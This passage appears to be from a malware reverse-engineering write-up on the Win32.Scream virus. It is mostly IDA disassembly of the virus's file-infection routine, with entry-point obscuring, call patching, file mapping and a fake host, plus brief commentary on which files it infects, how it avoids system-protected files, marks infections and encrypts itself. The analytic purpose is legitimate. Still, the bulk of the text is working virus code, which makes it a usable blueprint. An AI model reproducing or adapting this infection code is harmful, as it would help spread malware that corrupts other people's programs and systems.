CODE:00403AC3 test ecx, ecx CODE:00403AC5 jz short @@PopEIPFromDatabase CODE:00403AC5 CODE:00403AC7 dec dword ptr [ebp+2fch] CODE:00403ACD jz @@FinishedEPOSearch CODE:00403ACD CODE:00403AD3 cmp ecx, 5 CODE:00403AD6 jb @@SpotIsNotAvailable CODE:00403AD6

CODE:00403ADC cmp dword ptr [ebp+2b8h], 0 CODE:00403AE3 jz short @@CheckSpotProbability CODE:00403AE3 CODE:00403AE5 dec dword ptr [ebp+2b8h] CODE:00403AEB jmp @@SpotIsNotAvailable CODE:00403AEB CODE:00403AF0 CODE:00403AF0 CODE:00403AF0 @@PopEIPFromDatabase: CODE:00403AF0 CODE:00403AF0 mov ecx, [ebp+2a0h] CODE:00403AF6 test ecx, ecx CODE:00403AF8 jz @@FinishedEPOSearch CODE:00403AF8 CODE:00403AFE mov esi, [ebp+2a4h] CODE:00403B04 dec ecx CODE:00403B05 lea esi, [esi+ecx*4] CODE:00403B08 mov esi, [esi] CODE:00403B0A dec dword ptr [ebp+2a0h] CODE:00403B10 jmp short @@GetNextInstruction CODE:00403B10 CODE:00403B12 CODE:00403B12 CODE:00403B12 @@CheckSpotProbability: CODE:00403B12 push eax CODE:00403B13 mov eax, 64h CODE:00403B18 call RandomNumber CODE:00403B18 CODE:00403B1D test eax, eax CODE:00403B1F pop eax CODE:00403B20 jnz short @@SpotIsNotAvailable CODE:00403B20 CODE:00403B22 mov edi, [ebp+2a8h] CODE:00403B28 cmp edi, [ebp+2ach] CODE:00403B2E jz @@FinishedEPOSearch CODE:00403B2E CODE:00403B34 pusha CODE:00403B35 mov ebx, esi CODE:00403B37 lea esi, [ebp+2bch] CODE:00403B3D mov ecx, [ebp+2a8h] CODE:00403B43 jecxz short @@NoEPOSpots CODE:00403B43 CODE:00403B45 CODE:00403B45 @@FindDuplicateEPO: CODE:00403B45 lodsd CODE:00403B46 cmp eax, ebx CODE:00403B48 jnz short @@NoDuplicateFoundYet CODE:00403B48 CODE:00403B4A popa CODE:00403B4B jmp short @@SpotIsNotAvailable CODE:00403B4B CODE:00403B4D CODE:00403B4D CODE:00403B4D @@NoDuplicateFoundYet: CODE:00403B4D loop @@FindDuplicateEPO CODE:00403B4D CODE:00403B4F

CODE:00403B4F @@NoEPOSpots: CODE:00403B4F popa CODE:00403B50 mov [ebp+edi*4+2bch], esi CODE:00403B57 inc dword ptr [ebp+2a8h] CODE:00403B5D push eax CODE:00403B5E mov eax, 40h CODE:00403B63 call RandomNumber CODE:00403B63 CODE:00403B68 mov [ebp+2b8h], eax CODE:00403B6E pop eax CODE:00403B6E CODE:00403B6F CODE:00403B6F @@SpotIsNotAvailable: CODE:00403B6F CODE:00403B6F pusha CODE:00403B70 pusha CODE:00403B71 xchg eax, edx CODE:00403B72 mov edi, esi CODE:00403B74 test bl, 10b CODE:00403B77 jz short @@IsOneByte CODE:00403B77 CODE:00403B79 mov ebx, 24h CODE:00403B7E cmp dx, 0F80h CODE:00403B83 jz short @@SpecialOpcodeFound CODE:00403B83 CODE:00403B85 cmp dx, 0F88h CODE:00403B8A jnz short @@DoneCheckingSpecial CODE:00403B8A CODE:00403B8C CODE:00403B8C @@SpecialOpcodeFound: CODE:00403B8C CODE:00403B8C lea esi, SpecialHandlers CODE:00403B92 add ebx, esi CODE:00403B94 jmp ebx CODE:00403B94 CODE:00403B96 CODE:00403B96 CODE:00403B96 @@IsOneByte: CODE:00403B96 lea esi, EIPOpcodeTable CODE:00403B96 CODE:00403B9C CODE:00403B9C @@NextSubTable: CODE:00403B9C lodsb CODE:00403B9D movzx ecx, al CODE:00403BA0 jecxz short @@CheckJMPModRM CODE:00403BA0 CODE:00403BA2 lodsd CODE:00403BA3 xchg eax, ebx CODE:00403BA3 CODE:00403BA4 CODE:00403BA4 @@NextEntryInSubTable: CODE:00403BA4 lodsb CODE:00403BA5 cmp al, dl CODE:00403BA7 jz short @@SpecialOpcodeFound CODE:00403BA7 CODE:00403BA9 loop @@NextEntryInSubTable CODE:00403BA9

CODE:00403BAB jmp short @@NextSubTable CODE:00403BAB CODE:00403BAD CODE:00403BAD CODE:00403BAD @@CheckJMPModRM: CODE:00403BAD cmp dl, 0FFh CODE:00403BB0 jnz short @@DoneCheckingSpecial CODE:00403BB0 CODE:00403BB2 mov esi, edi CODE:00403BB4 inc esi CODE:00403BB5 lodsb CODE:00403BB6 and al, 38h CODE:00403BB8 cmp al, 20h CODE:00403BBA jz SpecialHandlers CODE:00403BBA CODE:00403BC0 CODE:00403BC0 @@DoneCheckingSpecial: CODE:00403BC0 CODE:00403BC0 popa CODE:00403BC1 clc CODE:00403BC1 CODE:00403BC2 CODE:00403BC2 @@ReturnFromSpecialHandler: CODE:00403BC2 CODE:00403BC2 popa CODE:00403BC3 jb @@GetNextInstruction CODE:00403BC3 CODE:00403BC9 add esi, ecx CODE:00403BCB jmp @@GetNextInstruction CODE:00403BCB CODE:00403BD0 CODE:00403BD0 CODE:00403BD0 @@FinishedEPOSearch: CODE:00403BD0 CODE:00403BD0 mov eax, [ebp+2a4h] CODE:00403BD6 lea esp, [eax+400h] CODE:00403BDC mov ecx, [ebp+2a8h] CODE:00403BE2 jecxz short @@UnMapFile CODE:00403BE2 CODE:00403BE4 CODE:00403BE4 @@SetNextEPO: CODE:00403BE4 dec ecx CODE:00403BE5 mov esi, [ebp+ecx*4+2bch] CODE:00403BEC push esi CODE:00403BED imul edi, ecx, 9 CODE:00403BF0 add edi, [ebp+2b4h] CODE:00403BF6 add edi, 2F93h CODE:00403BFC push edi CODE:00403BFD movsb CODE:00403BFE movsd CODE:00403BFF call GetSection CODE:00403BFF CODE:00403C04 pop edx CODE:00403C05 pop edi CODE:00403C06 mov al, 0E8h CODE:00403C08 stosb CODE:00403C09 lea eax, [edi+4]

CODE:00403C0C sub eax, [ebp+294h] CODE:00403C12 mov ebx, [ebp+290h] CODE:00403C18 add eax, [ebx+0ch] CODE:00403C1B push dword ptr [esi+34h] CODE:00403C1E pop dword ptr [edx-4] CODE:00403C21 add [edx-4], eax CODE:00403C24 sub eax, [ebp+2b0h] CODE:00403C2A neg eax CODE:00403C2C stosd CODE:00403C2D test ecx, ecx CODE:00403C2F jnz short @@SetNextEPO CODE:00403C2F CODE:00403C31 push 0 CODE:00403C33 mov eax, esp CODE:00403C35 push 0 CODE:00403C37 push esp CODE:00403C38 push eax CODE:00403C39 push dword ptr [ebp+28ch] CODE:00403C3F push dword ptr [ebp+284h] CODE:00403C45 mov al, 20h CODE:00403C47 call StealthAPI CODE:00403C47 CODE:00403C4C mov ebx, [esp+46ch+var_46c] CODE:00403C4F mov [eax+58h], ebx CODE:00403C52 add esp, 8 CODE:00403C55 inc dword ptr [ebp+280h] CODE:00403C55 CODE:00403C5B CODE:00403C5B @@UnMapFile: CODE:00403C5B CODE:00403C5B push dword ptr [ebp+284h] CODE:00403C61 mov al, 0Ah CODE:00403C63 call StealthAPI CODE:00403C63 CODE:00403C68 CODE:00403C68 @@CloseFile: CODE:00403C68 CODE:00403C68 push dword ptr [ebp+138h] CODE:00403C6E mov al, 5 CODE:00403C70 call StealthAPI CODE:00403C70 CODE:00403C75 lea eax, [ebp+150h] CODE:00403C7B push eax CODE:00403C7C lea eax, [ebp+148h] CODE:00403C82 push eax CODE:00403C83 lea eax, [ebp+140h] CODE:00403C89 push eax CODE:00403C8A push dword ptr [ebp+134h] CODE:00403C90 mov al, 12h CODE:00403C92 call StealthAPI CODE:00403C92 CODE:00403C97 push dword ptr [ebp+134h] CODE:00403C9D mov al, 5 CODE:00403C9F call StealthAPI CODE:00403C9F CODE:00403CA4 CODE:00403CA4 @@RestoreAttributes:

CODE:00403CA4 lea eax, [ebp+168h] CODE:00403CAA push dword ptr [ebp+13ch] CODE:00403CB0 push eax CODE:00403CB1 mov al, 11h CODE:00403CB3 call StealthAPI CODE:00403CB3 CODE:00403CB8 CODE:00403CB8 @@NotInfectable: CODE:00403CB8 CODE:00403CB8 xor ebx, ebx CODE:00403CBA push dword ptr [ebp+0f0h] CODE:00403CC0 pop dword ptr fs:[ebx] CODE:00403CC3 popa CODE:00403CC4 and InfectState, 0 CODE:00403CCB retn CODE:00403CCB CODE:00403CCB InfectFile endp CODE:00403CF3 SpecialHandlers: CODE:00403CF3 CODE:00403CF3 popa CODE:00403CF4 popa CODE:00403CF5 jmp @@PopEIPFromDatabase The pevious code checks if a file can be infected, and will infect it if possible. The virus infects EXE, CPL, OCR and SCR files. It sets RWX on all sections. The infected files are checksumed (PE Header). It also avoid Self Extractors. It saves filetime and attributes. Infects only files within a certain interval (32kb 1024kb) with some random exceptions. X flag on last section is infection mark. It avoids files that are protected by SFC/SFP/WFP. The infection code is encrypted with RDKE32. CODE:00403D78 GetSection proc near CODE:00403D78 CODE:00403D78 mov esi, [ebp+284h] CODE:00403D7E add esi, [esi+3ch] CODE:00403D81 movzx eax, word ptr [esi+14h] CODE:00403D85 lea eax, [eax+esi+18h] CODE:00403D89 movzx ebx, word ptr [esi+6] CODE:00403D8D dec ebx CODE:00403D8E imul ebx, 28h CODE:00403D91 add ebx, eax CODE:00403D93 retn CODE:00403D93 CODE:00403D93 GetSection endp The previous code block calculates a pointer to the last section header. CODE:00403D94 MapFile proc near CODE:00403D94 CODE:00403D94 push 0 CODE:00403D96 push ecx CODE:00403D97 push 0 CODE:00403D99 push 4 CODE:00403D9B push 0 CODE:00403D9D push dword ptr [ebp+134h] CODE:00403DA3 mov al, 0Bh CODE:00403DA5 call StealthAPI

CODE:00403DA5 CODE:00403DAA test eax, eax CODE:00403DAC jz short @@ErrorWhenMapping CODE:00403DAC CODE:00403DAE mov [ebp+138h], eax CODE:00403DB4 push 0 CODE:00403DB6 push 0 CODE:00403DB8 push 0 CODE:00403DBA push 6 CODE:00403DBC push eax CODE:00403DBD mov al, 9 CODE:00403DBF call StealthAPI CODE:00403DBF CODE:00403DC4 mov [ebp+284h], eax CODE:00403DC4 CODE:00403DCA CODE:00403DCA @@ErrorWhenMapping: CODE:00403DCA test eax, eax CODE:00403DCC retn CODE:00403DCC CODE:00403DCC MapFile endp The previous code block maps a file to memory for easy access. CODE:00403DCD HMA proc near CODE:00403DCD pusha CODE:00403DCD CODE:00403DCE CODE:00403DCE @@NextInstruction: CODE:00403DCE push esi CODE:00403DCF push edx CODE:00403DD0 call ILE CODE:00403DD0 CODE:00403DD5 add esi, edx CODE:00403DD7 pop edx CODE:00403DD8 or bh, bh CODE:00403DDA jnz short @@Nope CODE:00403DDA CODE:00403DDC inc esi CODE:00403DDD cmp al, 0A1h CODE:00403DDF jz short @@PatchIt CODE:00403DDF CODE:00403DE1 cmp al, 0A3h CODE:00403DE3 jz short @@PatchIt CODE:00403DE3 CODE:00403DE5 dec esi CODE:00403DE6 test bl, 4 CODE:00403DE9 jz short @@Nope CODE:00403DE9 CODE:00403DEB and bl, 3 CODE:00403DEE add esi, ebx CODE:00403DF0 lodsb CODE:00403DF1 and al, 0C7h CODE:00403DF3 cmp al, 5 CODE:00403DF5 jnz short @@Nope

CODE:00403DF5 CODE:00403DF7 CODE:00403DF7 @@PatchIt: CODE:00403DF7 CODE:00403DF7 add [esi], edx CODE:00403DF7 CODE:00403DF9 CODE:00403DF9 @@Nope: CODE:00403DF9 CODE:00403DF9 pop esi CODE:00403DFA add esi, ecx CODE:00403DFC cmp esi, edi CODE:00403DFE jnz short @@NextInstruction CODE:00403DFE CODE:00403E00 popa CODE:00403E01 retn CODE:00403E01 CODE:00403E01 HMA endp The previous code block is the main entry routine for the Hard coded Memory Access (HMA). The function expects the start of code in the ESI register, the new offsets in the EDI register and the delta offset in the EBP register. CODE:0040472D FRC_MakeCRC32Table proc near CODE:0040472D CODE:0040472D pusha CODE:0040472E cld CODE:0040472E CODE:0040472F CODE:0040472F @@AnotherEntry: CODE:0040472F mov al, [esi] CODE:00404731 test al, al CODE:00404733 jnz short @@MoreEntriesLeft CODE:00404733 CODE:00404735 popa CODE:00404736 retn CODE:00404736 CODE:00404737 CODE:00404737 CODE:00404737 @@MoreEntriesLeft: CODE:00404737 call GetCRC32OfString CODE:00404737 CODE:0040473C xchg eax, ebx CODE:0040473D stosd CODE:0040473E jmp short @@AnotherEntry CODE:0040473E CODE:0040473E FRC_MakeCRC32Table endp The previous code block creates a CRC32 table for the virus to use later. CODE:00404740 FRC_FakeHost CODE:00404740 CODE:00404740 dd 90909090h, 0FFB99090h, 90FFFFFFh, 68006A90h

CODE:00404750 CODE:00404754 CODE:00404755 CODE:00404759 CODE:0040475C CODE:00404764 dd offset NAME_SFC_DLL db 68h dd offset NAME_IMAGEHLP_DLL db 6Ah, 0, 0E8h dd 40Bh, 0F8E8006Ah db 3, 2 dup(0) The previous code block is the fake host of the virus. It shows a message and then exits. 5. Conclusion So, this was a journey through Win32.Scream. And that was an interesting one. So far I have reversed all of it s internals and well documented it as well. You ll find more information in each sepereate file that is found in the package. 6. Contact You can either contact me by e mail or IM. Feel free to write/send me your comments, ideas, feedbacks or criticism. For better security it would be better if you send me mails signed with my key, but it s not mandatory. E Mail: iamhalsten [at] gmail [dot] com IM: iamhalsten [at] hotmail [dot] com